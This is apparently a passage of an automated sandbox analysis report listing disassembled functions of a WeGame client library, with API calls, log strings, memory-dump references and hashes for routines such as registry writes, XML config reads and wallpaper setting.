                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$CloseCreateErrorH_prolog3_LastOpenValue
                                        • String ID: [Sys_wrapper]SetRegValue, open reg path failed, path:{}, error:{}$[Sys_wrapper]SetRegValue, set reg value failed, path:{}, value_name:{}, value:{}, error:{}$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 915176676-4197613765
                                        • Opcode ID: 80f9ac87a012a2e40a841528ee4aa872eed1926d10ddafe909220833b3f07b3b
                                        • Instruction ID: 427917f8ab9aa766945330f90dd3240fb2e666212bb3c2bce297fc4c19c0f0d3
                                        • Opcode Fuzzy Hash: 80f9ac87a012a2e40a841528ee4aa872eed1926d10ddafe909220833b3f07b3b
                                        • Instruction Fuzzy Hash: EC418A70A01308EBDB14CF94CC98BEEB7B6EF44704F604518E529AB680EB75AD19CF90
                                        Function 6C177FD5 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 161COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C177FDF
                                        • ?is_regular_file@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?), ref: 6C17800D
                                          • Part of subcall function 6C12FDA9: __EH_prolog3_GS.LIBCMT ref: 6C12FDB0
                                          • Part of subcall function 6C12FDA9: ?is_regular_file@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000,?,?,?,00000024,6C12FD90,?,?,?,?,?,?,?,?,0000001C), ref: 6C12FDE4
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6C178041
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C178048
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 6C1780FC
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?), ref: 6C17810B
                                        • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?), ref: 6C178123
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,?,?), ref: 6C178132
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\xmlconfig.cpp, xrefs: 6C178069
                                        • [E][common::GetXMLDataStr]config_file not exists, path=%s, xrefs: 6C17808E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$H_prolog3_W@2@@std@@$?wstring@path@filesystem@ierd_tgp@@V123@$?filename@path@filesystem@ierd_tgp@@?get_log_instance@base@@?is_regular_file@common@ierd_tgp@@?is_regular_file@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3H_prolog3_catch_Logger@1@U?$char_traits@V?$allocator@V?$basic_string@Verror_code@std@@@Vpath@12@W@2@@std@@@
                                        • String ID: [E][common::GetXMLDataStr]config_file not exists, path=%s$d:\ci_dev\wegame_client\codes\common\src\xmlconfig.cpp
                                        • API String ID: 1371752973-3796669117
                                        • Opcode ID: 48f24e8d79f44f775b0c7bcb0a6c257b9484e9709165e26af8d69a4b40696572
                                        • Instruction ID: 48f77de12ab527233d0c160e0f8ea3e0479110d578efd70e9fc746ce41e81d96
                                        • Opcode Fuzzy Hash: 48f24e8d79f44f775b0c7bcb0a6c257b9484e9709165e26af8d69a4b40696572
                                        • Instruction Fuzzy Hash: 0F614171900258DBDB25DFA4C894BDDBBB4AF28308F504099D145B7681DBB5AB88CFA2
                                        Function 6C1023C3 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C1023CD
                                        • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,00000090,6C1025AA,00000000,?,00000000), ref: 6C102415
                                        • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,00000000), ref: 6C102460
                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C102495
                                        • GetLastError.KERNEL32 ref: 6C10249F
                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C1024CF
                                        • GetLastError.KERNEL32 ref: 6C1024D9
                                        • CloseHandle.KERNEL32(?), ref: 6C102574
                                        • CloseHandle.KERNEL32(00000000), ref: 6C102580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: FileHandle$CloseCreateErrorInformationLast$H_prolog3_
                                        • String ID: ierd_tgp::filesystem::equivalent
                                        • API String ID: 633139043-749776550
                                        • Opcode ID: fd757ef6a50ad19aee77651003ea6ed06569e87569eb919d00040cc259897d80
                                        • Instruction ID: 53b2b6de226dfdfeb2c4c1b848941dc0a7bbeca7ec315dcad262bf061a5aa6ca
                                        • Opcode Fuzzy Hash: fd757ef6a50ad19aee77651003ea6ed06569e87569eb919d00040cc259897d80
                                        • Instruction Fuzzy Hash: 7D513C70A04218DFEF20DBA8C8A8BDDB7B9AB15328F544255E419E7580DB70AE458F64
                                        Function 6C15BC77 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C15BC81
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000094), ref: 6C15BC9D
                                        • ?get_largest_free_driver_hd_wmi@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000094), ref: 6C15BCFA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000094), ref: 6C15BD04
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,00000094), ref: 6C15BD71
                                        • ?get_largest_free_driver_hd_api@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,?,?,00000094), ref: 6C15BDCF
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15BCC3, 6C15BD27, 6C15BD95
                                        • [Sys_wrapper]get_largest_free_driver_hd_wmi returned empty, try api version, xrefs: 6C15BDA9
                                        • [Sys_wrapper]get_largest_free_driver_hd_wmi returned %s, xrefs: 6C15BD48
                                        • [Sys_wrapper]get_largest_free_driver_hd, xrefs: 6C15BCD5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$D@2@@std@@D@std@@H_prolog3_catch_Sys_wrapper@common@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@$?get_largest_free_driver_hd_api@?get_largest_free_driver_hd_wmi@H_prolog3
                                        • String ID: [Sys_wrapper]get_largest_free_driver_hd$[Sys_wrapper]get_largest_free_driver_hd_wmi returned %s$[Sys_wrapper]get_largest_free_driver_hd_wmi returned empty, try api version$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 2434815536-3985311550
                                        • Opcode ID: 1d825f079e949afba2834c8d55f44585685b5b65f0d48bf5819f7c9d092d94a6
                                        • Instruction ID: 829660170823bc2f82b47b61c96c27323ba2927dd683b11ae623713ecaafc8d4
                                        • Opcode Fuzzy Hash: 1d825f079e949afba2834c8d55f44585685b5b65f0d48bf5819f7c9d092d94a6
                                        • Instruction Fuzzy Hash: 9A41A171905208ABDB11DBB8C850BED77F99F55208F604098E514B7781EB35AE0ECBA1
                                        Function 6C177D67 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 131COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C177D71
                                        • ?is_regular_file@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,000000E0), ref: 6C177D86
                                          • Part of subcall function 6C12FDA9: __EH_prolog3_GS.LIBCMT ref: 6C12FDB0
                                          • Part of subcall function 6C12FDA9: ?is_regular_file@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000,?,?,?,00000024,6C12FD90,?,?,?,?,?,?,?,?,0000001C), ref: 6C12FDE4
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,000000E0), ref: 6C177DB1
                                          • Part of subcall function 6C14B57E: __EH_prolog3_GS.LIBCMT ref: 6C14B585
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,000000E0), ref: 6C177DB8
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000E0), ref: 6C177E4A
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000E0), ref: 6C177E59
                                        • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?,000000E0), ref: 6C177E71
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,?,?,000000E0), ref: 6C177E80
                                        Strings
                                        • [E][common::GetXMLDataInt]config_file not exists, path=%s, xrefs: 6C177DFC
                                        • d:\ci_dev\wegame_client\codes\common\src\xmlconfig.cpp, xrefs: 6C177DD9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$H_prolog3_W@2@@std@@$?wstring@path@filesystem@ierd_tgp@@V123@$?filename@path@filesystem@ierd_tgp@@?get_log_instance@base@@?is_regular_file@common@ierd_tgp@@?is_regular_file@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3H_prolog3_catch_Logger@1@U?$char_traits@V?$allocator@V?$basic_string@Verror_code@std@@@Vpath@12@W@2@@std@@@
                                        • String ID: [E][common::GetXMLDataInt]config_file not exists, path=%s$d:\ci_dev\wegame_client\codes\common\src\xmlconfig.cpp
                                        • API String ID: 1371752973-3771848454
                                        • Opcode ID: 5c1d0f7b8ae2a43703167da96bcf61603a6febf18707a79727521a91d48d14d6
                                        • Instruction ID: 1c6091277cf576700d0bc0cd69fb0742252ab9c169cb5716dce22e482b1024f9
                                        • Opcode Fuzzy Hash: 5c1d0f7b8ae2a43703167da96bcf61603a6febf18707a79727521a91d48d14d6
                                        • Instruction Fuzzy Hash: 84515471D00248DBDF25DFA4C890BEDBBB4AF25308F644599D401BB681DB35AE49CBA1
                                        Function 6C1561F1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 116comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C1561F8
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000074,6C121C8C,?,?,?,?,?,?,?,?,?,0000001C), ref: 6C156200
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,00000074,6C121C8C,?,?,?,?,?,?,?,?,?,0000001C), ref: 6C15628A
                                        • CoInitializeEx.OLE32(00000000,00000002,00000074,6C121C8C,?,?,?,?,?,?,?,?,?,0000001C), ref: 6C156294
                                        • CoCreateInstance.OLE32(6C35C580,00000000,00000001,6C35C590,?,?,?,?,?,?,0000001C), ref: 6C1562AB
                                        • memset.VCRUNTIME140(?,00000000,00000008,?,?,?,?,?,0000001C), ref: 6C1562C3
                                        • CoUninitialize.OLE32 ref: 6C15630C
                                        • CoUninitialize.OLE32(?,?,?,?,?,0000001C), ref: 6C156319
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C156226
                                        • [Sys_wrapper]SetDesktopWallpaper, pic_path: %s, style: %d, xrefs: 6C156248
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Uninitialize$?get_log_instance@base@@?u8to16@common@ierd_tgp@@CreateD@2@@std@@D@std@@H_prolog3H_prolog3_InitializeInstanceLogger@1@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@memset
                                        • String ID: [Sys_wrapper]SetDesktopWallpaper, pic_path: %s, style: %d$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 1398519230-1089274075
                                        • Opcode ID: dbb7e81813cfa55cb877eb4504df5dcab3a9b7bf13d2ff78982da061ed0c6651
                                        • Instruction ID: d49921a18a981c419f4f09203eb6868671bcc4112162e03b967c8237e15f0581
                                        • Opcode Fuzzy Hash: dbb7e81813cfa55cb877eb4504df5dcab3a9b7bf13d2ff78982da061ed0c6651
                                        • Instruction Fuzzy Hash: 7E417EB1A00209EFDB10DFA4C884EEDBBB8EF48318F604119E515BB690DB74AD45CFA0
                                        Function 6C12E7CD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12E7D7
                                        • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(00000264), ref: 6C12E7EF
                                        • ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 6C12E80D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?instance@?to_string@version_t@common@ierd_tgp@@Application@common@ierd_tgp@@D@2@@std@@D@std@@H_prolog3_U?$char_traits@V123@V?$allocator@V?$basic_string@
                                        • String ID: 9.9.9.999$pub_server_url_1$tconndserver
                                        • API String ID: 2835482490-2782576151
                                        • Opcode ID: 06a452c75b02e34c153bc9398f79152c555dd1bb5fedf9d3b0eacfc4f5d98a3a
                                        • Instruction ID: d829db4f7daba4e098ddbce3210a5ae43052c7469fb7b3f2732e44067a884dd6
                                        • Opcode Fuzzy Hash: 06a452c75b02e34c153bc9398f79152c555dd1bb5fedf9d3b0eacfc4f5d98a3a
                                        • Instruction Fuzzy Hash: 01417931A052589ECF24EFA4C898BECB7B4BF25208F1041D9D04DA7691DB356B89CF51
                                        Function 6C10BF2B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10BF32
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,expt,?,?,?,?,?,?,?,?,?,?,6C10C8DB), ref: 6C10BF70
                                          • Part of subcall function 6C0C712B: __EH_prolog3_GS.LIBCMT ref: 6C0C7132
                                          • Part of subcall function 6C0C712B: ?get_exe_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 6C0C714F
                                          • Part of subcall function 6C0C712B: ?gen_relative_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV34@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 6C0C7172
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(00000000), ref: 6C10BF80
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 6C10BF9F
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 6C10BFB7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10BFC1
                                        • GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000000C6,6C3CE62F), ref: 6C10BFFE
                                        Strings
                                        • expt, xrefs: 6C10BF59
                                        • d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp, xrefs: 6C10BFE5
                                        • [ExptFileProcesser] GetBasePath create directory failed(%d), xrefs: 6C10C005
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@H_prolog3_$Application@common@ierd_tgp@@$?gen_relative_path@common@ierd_tgp@@?get_app_sub_path@?get_exe_path@?get_log_instance@base@@?u8to16@common@ierd_tgp@@CreateD@2@@std@@0DirectoryErrorLastLogger@1@U?$char_traits@_V34@@V45@@V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@_waccessmemmove
                                        • String ID: [ExptFileProcesser] GetBasePath create directory failed(%d)$d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp$expt
                                        • API String ID: 364609222-2129707247
                                        • Opcode ID: 2e9342c2102f160a57a8d074fe1496220fd52662ccdf5abbab926e614bcd3eb9
                                        • Instruction ID: 03ee828b2a6d34f754248eafdf61eca4182e72704a222f8e435bbd782703dea9
                                        • Opcode Fuzzy Hash: 2e9342c2102f160a57a8d074fe1496220fd52662ccdf5abbab926e614bcd3eb9
                                        • Instruction Fuzzy Hash: 8E21B971A01701ABDB14EFA8C855BDD77B59F04718F34015CE410AB6C1EB36EA45CFA2
                                        Function 6C1062B9 Relevance: 16.7, APIs: 11, Instructions: 161COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C1062C0
                                          • Part of subcall function 6C0D6C50: __EH_prolog3.LIBCMT ref: 6C0D6C57
                                          • Part of subcall function 6C0D6C50: ?good@ios_base@std@@QBE_NXZ.MSVCP140(00000000,00000004,6C1062DB,00000000,00000030,6C108285,?,00000020), ref: 6C0D6C75
                                          • Part of subcall function 6C0D6C50: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 6C0D6C90
                                          • Part of subcall function 6C0D6C50: ?good@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6C0D6C9D
                                        • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000030,6C108285,?,00000020), ref: 6C1062F2
                                          • Part of subcall function 6C10855C: __EH_prolog3.LIBCMT ref: 6C108563
                                          • Part of subcall function 6C10855C: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6C122A73,?,?,?,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?), ref: 6C10856E
                                          • Part of subcall function 6C10855C: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?,?,?,?,?,?,?), ref: 6C108585
                                          • Part of subcall function 6C10855C: std::locale::_Getfacet.LIBCPMT ref: 6C10858F
                                          • Part of subcall function 6C10855C: ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?), ref: 6C1085A8
                                          • Part of subcall function 6C10855C: std::_Facet_Register.LIBCPMT ref: 6C1085C0
                                          • Part of subcall function 6C10855C: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?,?,?,?,?,?), ref: 6C1085E3
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C106318
                                        • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 6C106340
                                        • ?flags@ios_base@std@@QBEHXZ.MSVCP140 ref: 6C10635E
                                        • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?), ref: 6C106394
                                        • ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP140(?), ref: 6C1063DA
